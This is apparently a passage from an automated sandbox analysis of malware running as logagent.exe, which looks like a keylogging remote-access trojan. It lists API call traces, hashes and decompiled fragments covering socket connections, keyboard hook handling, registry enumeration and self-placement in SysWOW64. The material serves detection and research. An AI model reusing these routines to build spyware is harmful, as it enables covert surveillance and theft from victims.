                                  • atoi.MSVCRT ref: 0040D7F7
                                  • CloseWindow.USER32 ref: 0040D7FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                  • String ID:
                                  • API String ID: 14144500-0
                                  • Opcode ID: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                  • Opcode Fuzzy Hash: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1976170855-0
                                  • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                  • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 105513D5: CreateDCA.GDI32(00416A4C,00000000,00000000,00000000), ref: 105513EB
                                    • Part of subcall function 105513D5: CreateCompatibleDC.GDI32(00000000), ref: 105513F7
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 10551016
                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 10551063
                                  • _itoa.MSVCRT ref: 105510EB
                                    • Part of subcall function 105439C7: socket.WS2_32(00000000,00000001,00000006), ref: 105439E2
                                    • Part of subcall function 10543A2A: connect.WS2_32(0041B240,0041B244,00000010), ref: 10543A40
                                    • Part of subcall function 10543AA7: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 10543ABC
                                    • Part of subcall function 105540A7: _itoa.MSVCRT ref: 105540C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$Stream_itoa$CompatibleThreadconnectsocket
                                  • String ID: \nA
                                  • API String ID: 159159912-1614952937
                                  • Opcode ID: 887fefdff4b9106ef7b153adbaebfe2e04036b8f53b5bc635dc1b2e5bd886e97
                                  • Instruction ID: b939c248a2a7e6bf0cc2867cce83b4bfa739b1a2636a66479e610c562e7b032f
                                  • Opcode Fuzzy Hash: 887fefdff4b9106ef7b153adbaebfe2e04036b8f53b5bc635dc1b2e5bd886e97
                                  • Instruction Fuzzy Hash: B591427290021DEBDB14DFA0DC59EEE7B7DEF44201F10856AF816E7150EB746A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EventSleep
                                  • String ID: $
                                  • API String ID: 3275870920-3993045852
                                  • Opcode ID: 74350d5794e9d1ddc4f047256346b843da24c49d7deff20e03ded8982447acdf
                                  • Instruction ID: cc1d7faac4514fc19243646ab13af6a10a2cebfe12d0850823233943f7d9729a
                                  • Opcode Fuzzy Hash: 74350d5794e9d1ddc4f047256346b843da24c49d7deff20e03ded8982447acdf
                                  • Instruction Fuzzy Hash: 3F616176900118EFDB04EBA4DC9D9EE7B78EF84340F50886AF512D71A1EF706A48CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 10544B5B
                                  • exit.MSVCRT ref: 10544B67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShellexit
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$origmsc
                                  • API String ID: 137663079-2557571477
                                  • Opcode ID: ddc5c2cbe83fe2f2ac0e72afd0d9be2be7e0f738db7ff9288bf545ae16f157ff
                                  • Instruction ID: 7353cb4657106ea7f52f2668683cdb3595eff930321c7d2a2c3351ee2dd03edb
                                  • Opcode Fuzzy Hash: ddc5c2cbe83fe2f2ac0e72afd0d9be2be7e0f738db7ff9288bf545ae16f157ff
                                  • Instruction Fuzzy Hash: FC218376A40509EBD704A7A0DD8EEEE7B2CDBC4751F604036F502E6190EAB459408BB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E10547659(struct HHOOK__** __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t9;
                                  				struct HHOOK__* _t19;
                                  				struct HHOOK__** _t33;
                                  
                                  				_push(__ecx);
                                  				_t33 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                  					_t9 = 0;
                                  				} else {
                                  					 *0x415318( &_v5);
                                  					E10547762(__ecx);
                                  					 *0x415318();
                                  					 *0x415318();
                                  					E105539CA("[INFO]",  &_v6, 0x415aa4,  &_v5, 0x415aa4);
                                  					_t33[0xf] = 0;
                                  					_t33[0xa] = 0;
                                  					CloseHandle(_t33[0xd]);
                                  					if(_t33[0xf] == 0) {
                                  						_t19 =  *_t33;
                                  						if(_t19 != 0) {
                                  							UnhookWindowsHookEx(_t19);
                                  							 *_t33 = 0;
                                  						}
                                  					}
                                  					_t9 = 1;
                                  				}
                                  				return _t9;
                                  			}

                                  APIs
                                    • Part of subcall function 10547762: GetLocalTime.KERNEL32(?,?,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,10546B55), ref: 10547770
                                    • Part of subcall function 10547762: malloc.MSVCRT ref: 105477C6
                                    • Part of subcall function 10547762: sprintf.MSVCRT ref: 105477F8
                                    • Part of subcall function 10547762: SetEvent.KERNEL32(?), ref: 10547824
                                    • Part of subcall function 10547762: ??3@YAXPAX@Z.MSVCRT ref: 1054782B
                                    • Part of subcall function 105539CA: GetLocalTime.KERNEL32(?), ref: 105539E1
                                    • Part of subcall function 105539CA: printf.MSVCRT ref: 10553A4E
                                  • CloseHandle.KERNEL32(?), ref: 105476BA
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 105476CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime$??3@CloseEventHandleHookUnhookWindowsmallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 547747356-2146459034
                                  • Opcode ID: 860fbde85192dd7b6597efc6834a2cf610bdab54b31f9bfde00621dbe1de695b
                                  • Instruction ID: 358d029a370fb5c3c29b7bf3bacbe616ff850e9ea57b301d97533ab836408334
                                  • Opcode Fuzzy Hash: 860fbde85192dd7b6597efc6834a2cf610bdab54b31f9bfde00621dbe1de695b
                                  • Instruction Fuzzy Hash: 3901F575610A48AF9700AB68DD898FEBFBDEA81190350486DE842C3600E771AD488BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E10546836(void* __ecx, void* __edx) {
                                  				void* _t17;
                                  				intOrPtr* _t18;
                                  				void* _t38;
                                  				signed int _t40;
                                  				void* _t45;
                                  				intOrPtr _t47;
                                  
                                  				_t38 = __edx;
                                  				L10555859();
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				 *((intOrPtr*)(_t45 - 0x10)) = _t47;
                                  				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                                  				_t40 = 0;
                                  				 *(_t45 - 0x14) = 0;
                                  				while(1) {
                                  					_t17 = E105468FE(0x41b8d8);
                                  					_t50 = _t40 - _t17;
                                  					if(_t40 >= _t17) {
                                  						break;
                                  					}
                                  					_t18 = E10546914(0x41b8d8, _t38, _t50, _t40);
                                  					_t51 =  *_t18 -  *((intOrPtr*)(_t45 + 8));
                                  					if( *_t18 ==  *((intOrPtr*)(_t45 + 8))) {
                                  						_push( *((intOrPtr*)( *((intOrPtr*)(E10546914(0x41b8d8, _t38, _t51, _t40) + 8)))));
                                  						L10555B17();
                                  						TerminateThread( *(E10546914(0x41b8d8, _t38, _t51, _t40) + 4), 0);
                                  						E10546941(0x41b8d8, E1054BC06(0x41b8d8) + (_t40 + _t40 * 2) * 4);
                                  					}
                                  					_t40 = _t40 + 1;
                                  					 *(_t45 - 0x14) = _t40;
                                  				}
                                  				_t13 = _t45 - 4;
                                  				 *_t13 =  *(_t45 - 4) | 0xffffffff;
                                  				__eflags =  *_t13;
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                  				return _t17;
                                  			}

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 1054683B
                                  • closesocket.WS2_32(?), ref: 1054687D
                                  • TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,10546580,00000000), ref: 1054688F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prologTerminateThreadclosesocket
                                  • String ID: $BA
                                  • API String ID: 1123047452-59861935
                                  • Opcode ID: 4612aca2cedbb1d56acc8d6422a985439a51e254ee7cf11d244eb5bf3264ca34
                                  • Instruction ID: acda21bac7246d83f130e974bb7d2651b3327736bfb58576b2d5a87e91fedf57
                                  • Opcode Fuzzy Hash: 4612aca2cedbb1d56acc8d6422a985439a51e254ee7cf11d244eb5bf3264ca34
                                  • Instruction Fuzzy Hash: 0001A135B00511EFDB05DF58C859BEDBBA9EFC4A54F20412AF002E7160EBB46E018AA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: KeepAlive Disabled!$[WARNING]
                                  • API String ID: 2944585167-3856563802
                                  • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                  • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                    • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 004018A2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 1986322901-3016609489
                                  • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                  • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 00405019
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 3609083747-3016609489
                                  • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                  • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412019() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                  				 *0x41c1dc = _t2;
                                  				return _t2;
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                  • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F4AE() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                  				 *0x41bf1c = _t2;
                                  				return _t2;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                  • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00413AED() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                  				 *0x41c1f8 = _t2;
                                  				return _t2;
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                  • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetConsoleWindow$kernel32.dll
                                  • API String ID: 2574300362-100875112
                                  • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                  • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,00416D14,00000000,00020019,?), ref: 10554A6E
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 10554AEF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 979fdd5254cc4c27311b9c274e256766b3b49beeaf30f9016725a57611e26328
                                  • Instruction ID: deda25523b40f07d485e4c6beafc31ad429a85cb0bfd500da4c4ec30344f3b2f
                                  • Opcode Fuzzy Hash: 979fdd5254cc4c27311b9c274e256766b3b49beeaf30f9016725a57611e26328
                                  • Instruction Fuzzy Hash: CF91E77280011DEBCB10EB90DD99EEEBB7CEF54345F1041A6B506E3050EA75AB48CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 1054D51E
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 1054D54D
                                  • RegEnumValueW.ADVAPI32(?,?,?,00003FFF,00000000,?,?,00002710), ref: 1054D5F6
                                  • _itoa.MSVCRT ref: 1054D60D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Enum$InfoQueryValue_itoa
                                  • String ID:
                                  • API String ID: 1491424833-0
                                  • Opcode ID: b1867c68a391b90c66befa23e548497b30fbbf7e2f0c3cf9f2592526b94ff00a
                                  • Instruction ID: abee16490ea2dc664203fc956c9549b579dec4f08fefc88b704cadffb3268a36
                                  • Opcode Fuzzy Hash: b1867c68a391b90c66befa23e548497b30fbbf7e2f0c3cf9f2592526b94ff00a
                                  • Instruction Fuzzy Hash: D971967290021EEFDB01DBD0DC99DEEBB7DEB48345F104166E606E2150EB74AA49CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10543CFC
                                  • CreateThread.KERNEL32(00000000,00000000,?,0041B240,00000000,00000000), ref: 10543D0D
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10543D18
                                  • CloseHandle.KERNEL32(00000000), ref: 10543D21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3360349984-0
                                  • Opcode ID: f6904c9295964ea6d05f5ace830b7d8d921c2bddda9a6e6440481497a3acfa2b
                                  • Instruction ID: 2ba0387754a66bb31b6ac716df962f2aa01e25be4528ebc63d140d98dc666e2e
                                  • Opcode Fuzzy Hash: f6904c9295964ea6d05f5ace830b7d8d921c2bddda9a6e6440481497a3acfa2b
                                  • Instruction Fuzzy Hash: 0B51EB7290060EEFCB049FA4DD99CEEBF79FF88395B008429F91297161DB709A85CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 1054C61B: TerminateProcess.KERNEL32(00000000,?,10549BE2), ref: 1054C62B
                                    • Part of subcall function 1054C61B: WaitForSingleObject.KERNEL32(000000FF,?,10549BE2), ref: 1054C63E
